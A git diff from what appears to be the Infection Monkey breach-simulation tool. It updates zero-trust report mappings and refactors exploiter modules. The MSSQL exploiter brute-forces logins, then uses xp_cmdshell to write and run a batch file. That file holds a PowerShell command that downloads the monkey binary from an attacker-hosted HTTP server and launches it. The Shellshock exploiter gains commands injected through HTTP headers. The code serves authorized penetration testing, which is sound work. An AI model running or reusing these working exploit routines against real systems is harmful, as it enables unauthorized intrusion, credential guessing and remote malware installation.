@ -2,7 +2,7 @@
|
|||
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
|
||||
in creating findings.
|
||||
|
||||
This file contains static mappings between zero trust components such as: pillars, recommendations, tests, statuses.
|
||||
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
|
||||
Some of the mappings are computed when this module is loaded.
|
||||
"""
|
||||
|
||||
|
@ -17,10 +17,10 @@ PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUT
|
|||
|
||||
STATUS_UNEXECUTED = u"Unexecuted"
|
||||
STATUS_PASSED = u"Passed"
|
||||
STATUS_INCONCLUSIVE = u"Inconclusive"
|
||||
STATUS_VERIFY = u"Verify"
|
||||
STATUS_FAILED = u"Failed"
|
||||
# Don't change order! The statuses are ordered by importance/severity.
|
||||
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_INCONCLUSIVE, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||
|
||||
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
|
||||
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
|
||||
|
@ -29,6 +29,8 @@ TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
|
|||
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
|
||||
TEST_SEGMENTATION = u"segmentation"
|
||||
TEST_TUNNELING = u"tunneling"
|
||||
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
|
||||
TESTS = (
|
||||
TEST_SEGMENTATION,
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
|
@ -36,25 +38,32 @@ TESTS = (
|
|||
TEST_ENDPOINT_SECURITY_EXISTS,
|
||||
TEST_MACHINE_EXPLOITED,
|
||||
TEST_DATA_ENDPOINT_HTTP,
|
||||
TEST_DATA_ENDPOINT_ELASTIC
|
||||
TEST_DATA_ENDPOINT_ELASTIC,
|
||||
TEST_TUNNELING,
|
||||
TEST_COMMUNICATE_AS_NEW_USER
|
||||
)
|
||||
|
||||
RECOMMENDATION_DATA_TRANSIT = u"data_transit"
|
||||
RECOMMENDATION_ENDPOINT_SECURITY = u"endpoint_security"
|
||||
RECOMMENDATION_USER_BEHAVIOUR = u"user_behaviour"
|
||||
RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||
RECOMMENDATION_SEGMENTATION = u"segmentation"
|
||||
RECOMMENDATIONS = {
|
||||
RECOMMENDATION_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||
RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||
RECOMMENDATION_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||
RECOMMENDATION_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||
RECOMMENDATION_DATA_TRANSIT: u"Secure data at transit by encrypting it."
|
||||
PRINCIPLE_DATA_TRANSIT = u"data_transit"
|
||||
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
|
||||
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||
PRINCIPLE_SEGMENTATION = u"segmentation"
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
|
||||
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
|
||||
PRINCIPLES = {
|
||||
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
|
||||
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
|
||||
u"Access Control) only.",
|
||||
}
|
||||
|
||||
POSSIBLE_STATUSES_KEY = u"possible_statuses"
|
||||
PILLARS_KEY = u"pillars"
|
||||
RECOMMENDATION_KEY = u"recommendation_key"
|
||||
PRINCIPLE_KEY = u"principle_key"
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
|
||||
TEST_EXPLANATION_KEY = u"explanation"
|
||||
TESTS_MAP = {
|
||||
|
@ -64,18 +73,18 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
||||
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_SEGMENTATION,
|
||||
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
|
||||
PILLARS_KEY: [NETWORKS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
|
||||
},
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_INCONCLUSIVE: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ANALYZE_NETWORK_TRAFFIC,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
|
||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_ENDPOINT_SECURITY_EXISTS: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
|
||||
|
@ -83,7 +92,7 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
|
||||
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ENDPOINT_SECURITY,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
PILLARS_KEY: [DEVICES],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
|
@ -93,19 +102,19 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
|
||||
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_ENDPOINT_SECURITY,
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
PILLARS_KEY: [DEVICES],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_SCHEDULED_EXECUTION: {
|
||||
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_INCONCLUSIVE: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_USER_BEHAVIOUR,
|
||||
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
||||
PILLARS_KEY: [PEOPLE, NETWORKS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_INCONCLUSIVE]
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_DATA_ENDPOINT_ELASTIC: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||
|
@ -113,7 +122,7 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_DATA_TRANSIT,
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
|
@ -123,10 +132,29 @@ TESTS_MAP = {
|
|||
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
|
||||
},
|
||||
RECOMMENDATION_KEY: RECOMMENDATION_DATA_TRANSIT,
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
TEST_TUNNELING: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
|
||||
},
|
||||
TEST_COMMUNICATE_AS_NEW_USER: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
|
||||
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
}
|
||||
|
||||
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
|
||||
|
@ -143,15 +171,15 @@ PILLARS_TO_TESTS = {
|
|||
AUTOMATION_ORCHESTRATION: []
|
||||
}
|
||||
|
||||
RECOMMENDATIONS_TO_TESTS = {}
|
||||
PRINCIPLES_TO_TESTS = {}
|
||||
|
||||
RECOMMENDATIONS_TO_PILLARS = {}
|
||||
PRINCIPLES_TO_PILLARS = {}
|
||||
|
||||
|
||||
def populate_mappings():
|
||||
populate_pillars_to_tests()
|
||||
populate_recommendations_to_tests()
|
||||
populate_recommendations_to_pillars()
|
||||
populate_principles_to_tests()
|
||||
populate_principles_to_pillars()
|
||||
|
||||
|
||||
def populate_pillars_to_tests():
|
||||
|
@ -161,17 +189,17 @@ def populate_pillars_to_tests():
|
|||
PILLARS_TO_TESTS[pillar].append(test)
|
||||
|
||||
|
||||
def populate_recommendations_to_tests():
|
||||
for single_recommendation in RECOMMENDATIONS:
|
||||
RECOMMENDATIONS_TO_TESTS[single_recommendation] = []
|
||||
def populate_principles_to_tests():
|
||||
for single_principle in PRINCIPLES:
|
||||
PRINCIPLES_TO_TESTS[single_principle] = []
|
||||
for test, test_info in TESTS_MAP.items():
|
||||
RECOMMENDATIONS_TO_TESTS[test_info[RECOMMENDATION_KEY]].append(test)
|
||||
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
|
||||
|
||||
|
||||
def populate_recommendations_to_pillars():
|
||||
for recommendation, recommendation_tests in RECOMMENDATIONS_TO_TESTS.items():
|
||||
recommendations_pillars = set()
|
||||
for test in recommendation_tests:
|
||||
def populate_principles_to_pillars():
|
||||
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||
principles_pillars = set()
|
||||
for test in principle_tests:
|
||||
for pillar in TESTS_MAP[test][PILLARS_KEY]:
|
||||
recommendations_pillars.add(pillar)
|
||||
RECOMMENDATIONS_TO_PILLARS[recommendation] = recommendations_pillars
|
||||
principles_pillars.add(pillar)
|
||||
PRINCIPLES_TO_PILLARS[principle] = principles_pillars
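As a quick illustration of how the renamed principle mappings are consumed, here is a minimal sketch (the import path is assumed from this file's location and is not part of this commit):

# Sketch only -- the module path is an assumption, adjust to the real package layout.
from common.data import zero_trust_consts as consts

consts.populate_mappings()  # the *_TO_* dicts are empty until this runs

# Tests that belong to the "segmentation" principle, e.g. TEST_SEGMENTATION.
segmentation_tests = consts.PRINCIPLES_TO_TESTS[consts.PRINCIPLE_SEGMENTATION]

# Pillars reached by that principle, derived from each test's PILLARS_KEY.
segmentation_pillars = consts.PRINCIPLES_TO_PILLARS[consts.PRINCIPLE_SEGMENTATION]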
|
||||
|
|
|
@ -75,7 +75,7 @@ class HostExploiter(object):
|
|||
"""
|
||||
powershell = True if "powershell" in cmd.lower() else False
|
||||
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
|
||||
|
||||
|
||||
|
||||
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
|
||||
from infection_monkey.exploit.wmiexec import WmiExploiter
|
||||
|
|
|
@ -1,17 +1,18 @@
|
|||
import logging
|
||||
import os
|
||||
import textwrap
|
||||
import sys
|
||||
from time import sleep
|
||||
|
||||
import pymssql
|
||||
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.exploit import HostExploiter
|
||||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, get_target_monkey, \
|
||||
build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
|
||||
from infection_monkey.model import DROPPER_ARG
|
||||
from infection_monkey.utils import get_monkey_dir_path
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
@ -25,98 +26,145 @@ class MSSQLExploiter(HostExploiter):
|
|||
# Time in seconds to wait between MSSQL queries.
|
||||
QUERY_BUFFER = 0.5
|
||||
SQL_DEFAULT_TCP_PORT = '1433'
|
||||
|
||||
# Temporary file that saves commands for monkey's download and execution.
|
||||
TMP_FILE_NAME = 'tmp_monkey.bat'
|
||||
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
||||
|
||||
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
|
||||
|
||||
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
|
||||
XP_CMDSHELL_COMMAND_END = "\""
|
||||
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
||||
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
||||
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
|
||||
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
|
||||
|
||||
def __init__(self, host):
|
||||
super(MSSQLExploiter, self).__init__(host)
|
||||
self.cursor = None
|
||||
self.monkey_server = None
|
||||
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
|
||||
|
||||
def _exploit_host(self):
|
||||
"""
|
||||
This method first brute-forces credentials to get the MSSQL connection (cursor).
|
||||
Note: call start_monkey_server() before self.upload_monkey(), and stop_monkey_server() after it.
|
||||
"""
|
||||
# Brute force to get connection
|
||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||
cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
|
||||
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
|
||||
|
||||
if not cursor:
|
||||
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
return False
|
||||
# Create dir for payload
|
||||
self.create_temp_dir()
|
||||
|
||||
# Get monkey exe for host and it's path
|
||||
src_path = get_target_monkey(self.host)
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
try:
|
||||
self.create_empty_payload_file()
|
||||
|
||||
# Create server for http download and wait for it's startup.
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||
if not http_path:
|
||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||
return False
|
||||
LOG.info("Started http server on %s", http_path)
|
||||
self.start_monkey_server()
|
||||
self.upload_monkey()
|
||||
self.stop_monkey_server()
|
||||
|
||||
dst_path = get_monkey_dest_path(http_path)
|
||||
tmp_file_path = os.path.join(get_monkey_dir_path(), MSSQLExploiter.TMP_FILE_NAME)
|
||||
# Clear payload to pass in another command
|
||||
self.create_empty_payload_file()
|
||||
|
||||
# Create monkey dir.
|
||||
commands = ["xp_cmdshell \"mkdir %s\"" % get_monkey_dir_path()]
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
self.run_monkey()
|
||||
|
||||
# Form download command in a file
|
||||
commands = [
|
||||
"xp_cmdshell \"<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s\"" % tmp_file_path,
|
||||
"xp_cmdshell \"<nul set /p=(^\'%s^\' >>%s\"" % (http_path, tmp_file_path),
|
||||
"xp_cmdshell \"<nul set /p=, ^\'%s^\') >>%s\"" % (dst_path, tmp_file_path)]
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
MSSQLExploiter.run_file(cursor, tmp_file_path)
|
||||
self.add_executed_cmd(' '.join(commands))
|
||||
# Form monkey's command in a file
|
||||
self.remove_temp_dir()
|
||||
except Exception as e:
|
||||
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
|
||||
|
||||
return True
|
||||
|
||||
def run_payload_file(self):
|
||||
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
|
||||
return self.run_mssql_command(file_running_command)
|
||||
|
||||
def create_temp_dir(self):
|
||||
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
||||
self.run_mssql_command(dir_creation_command)
|
||||
|
||||
def create_empty_payload_file(self):
|
||||
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
||||
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
||||
self.run_mssql_command(tmp_file_creation_command)
|
||||
|
||||
def run_mssql_command(self, mssql_command):
|
||||
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
|
||||
if not array_of_commands:
|
||||
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
|
||||
self.run_mssql_commands(array_of_commands)
|
||||
|
||||
def run_monkey(self):
|
||||
monkey_launch_command = self.get_monkey_launch_command()
|
||||
self.run_mssql_command(monkey_launch_command)
|
||||
self.run_payload_file()
|
||||
|
||||
def run_mssql_commands(self, cmds):
|
||||
for cmd in cmds:
|
||||
self.cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
|
||||
def upload_monkey(self):
|
||||
monkey_download_command = self.write_download_command_to_payload()
|
||||
self.run_payload_file()
|
||||
self.add_executed_cmd(monkey_download_command.command)
|
||||
|
||||
def remove_temp_dir(self):
|
||||
# Remove temporary dir we stored payload at
|
||||
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
|
||||
self.run_mssql_command(tmp_file_removal_command)
|
||||
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
||||
self.run_mssql_command(tmp_dir_removal_command)
|
||||
|
||||
def start_monkey_server(self):
|
||||
self.monkey_server = MonkeyHTTPServer(self.host)
|
||||
self.monkey_server.start()
|
||||
|
||||
def stop_monkey_server(self):
|
||||
self.monkey_server.stop()
|
||||
|
||||
def write_download_command_to_payload(self):
|
||||
monkey_download_command = self.get_monkey_download_command()
|
||||
self.run_mssql_command(monkey_download_command)
|
||||
return monkey_download_command
|
||||
|
||||
def get_monkey_launch_command(self):
|
||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||
# Form monkey's launch command
|
||||
monkey_args = build_monkey_commandline(self.host,
|
||||
get_monkey_depth() - 1,
|
||||
dst_path)
|
||||
monkey_args = ["xp_cmdshell \"<nul set /p=%s >>%s\"" % (part, tmp_file_path)
|
||||
for part in textwrap.wrap(monkey_args, 40)]
|
||||
commands = ["xp_cmdshell \"<nul set /p=%s %s >%s\"" % (dst_path, DROPPER_ARG, tmp_file_path)]
|
||||
commands.extend(monkey_args)
|
||||
MSSQLExploiter.execute_command(cursor, commands)
|
||||
MSSQLExploiter.run_file(cursor, tmp_file_path)
|
||||
self.add_executed_cmd(commands[-1])
|
||||
return True
|
||||
suffix = ">>{}".format(self.payload_file_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
|
||||
prefix=prefix,
|
||||
suffix=suffix)
|
||||
|
||||
@staticmethod
|
||||
def run_file(cursor, file_path):
|
||||
command = ["exec xp_cmdshell \"%s\"" % file_path]
|
||||
return MSSQLExploiter.execute_command(cursor, command)
|
||||
|
||||
@staticmethod
|
||||
def execute_command(cursor, cmds):
|
||||
"""
|
||||
Executes commands on MSSQL server
|
||||
:param cursor: MSSQL connection
|
||||
:param cmds: list of commands in MSSQL syntax.
|
||||
:return: True if successfully executed, false otherwise.
|
||||
"""
|
||||
try:
|
||||
# Running the cmd on remote host
|
||||
for cmd in cmds:
|
||||
cursor.execute(cmd)
|
||||
sleep(MSSQLExploiter.QUERY_BUFFER)
|
||||
except Exception as e:
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host: %s' % e)
|
||||
return False
|
||||
return True
|
||||
def get_monkey_download_command(self):
|
||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
|
||||
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
|
||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
||||
return MSSQLLimitedSizePayload(command=monkey_download_command,
|
||||
suffix=suffix,
|
||||
prefix=prefix)
|
||||
|
||||
def brute_force(self, host, port, users_passwords_pairs_list):
|
||||
"""
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
Starts the brute force connection attempts and if needed then init the payload process.
|
||||
Main loop starts here.
|
||||
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||
Args:
|
||||
host (str): Host ip address
|
||||
port (str): Tcp port that the host listens to
|
||||
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
|
||||
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||
"""
|
||||
Return:
|
||||
True or False depends if the whole bruteforce and attack process was completed successfully or not
|
||||
"""
|
||||
# Main loop
|
||||
# Iterates on users list
|
||||
for user, password in users_passwords_pairs_list:
|
||||
|
@ -138,4 +186,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
||||
'aborting brute force'.format(host, port))
|
||||
return None
|
||||
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
||||
|
||||
|
||||
class MSSQLLimitedSizePayload(LimitedSizePayload):
|
||||
def __init__(self, command, prefix="", suffix=""):
|
||||
super(MSSQLLimitedSizePayload, self).__init__(command=command,
|
||||
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
|
||||
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
|
||||
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
|
||||
|
|
|
@ -20,6 +20,7 @@ LOG = logging.getLogger(__name__)
|
|||
TIMEOUT = 2
|
||||
TEST_COMMAND = '/bin/uname -a'
|
||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||
LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
|
||||
|
||||
|
||||
class ShellShockExploiter(HostExploiter):
|
||||
|
@ -108,6 +109,10 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
|
||||
if not self._create_lock_file(exploit, url, header):
|
||||
LOG.info("Another monkey is running shellshock exploit")
|
||||
return True
|
||||
|
||||
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
|
||||
|
||||
if not http_path:
|
||||
|
@ -124,6 +129,8 @@ class ShellShockExploiter(HostExploiter):
|
|||
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
self._remove_lock_file(exploit, url, header)
|
||||
|
||||
if (http_thread.downloads != 1) or (
|
||||
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||
|
@ -182,6 +189,17 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
|
||||
return False,
|
||||
|
||||
def _create_lock_file(self, exploit, url, header):
|
||||
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
|
||||
return False
|
||||
cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
return True
|
||||
|
||||
def _remove_lock_file(self, exploit, url, header):
|
||||
cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
|
||||
self.attack_page(url, header, cmd)
|
||||
|
||||
@staticmethod
|
||||
def attack_page(url, header, attack):
|
||||
result = ""
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
|
||||
|
||||
class ExploitingVulnerableMachineError(Exception):
|
||||
""" Raise when exploiter failed, but machine is vulnerable"""
|
||||
pass
|
|
@ -47,6 +47,13 @@ def get_interface_to_target(dst):
|
|||
return ret[1]
|
||||
|
||||
|
||||
def try_get_target_monkey(host):
|
||||
src_path = get_target_monkey(host)
|
||||
if not src_path:
|
||||
raise Exception("Can't find suitable monkey executable for host %r", host)
|
||||
return src_path
|
||||
|
||||
|
||||
def get_target_monkey(host):
|
||||
from infection_monkey.control import ControlClient
|
||||
import platform
|
||||
|
|
|
@ -7,8 +7,8 @@ from threading import Lock
|
|||
from infection_monkey.network.firewall import app as firewall
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from infection_monkey.transport import HTTPServer, LockedHTTPServer
|
||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||
|
||||
from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target
|
||||
from infection_monkey.model import DOWNLOAD_TIMEOUT
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -16,6 +16,7 @@ LOG = logging.getLogger(__name__)
|
|||
|
||||
|
||||
class HTTPTools(object):
|
||||
|
||||
@staticmethod
|
||||
def create_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
if not local_port:
|
||||
|
@ -33,6 +34,14 @@ class HTTPTools(object):
|
|||
|
||||
return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
|
||||
|
||||
@staticmethod
|
||||
def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None):
|
||||
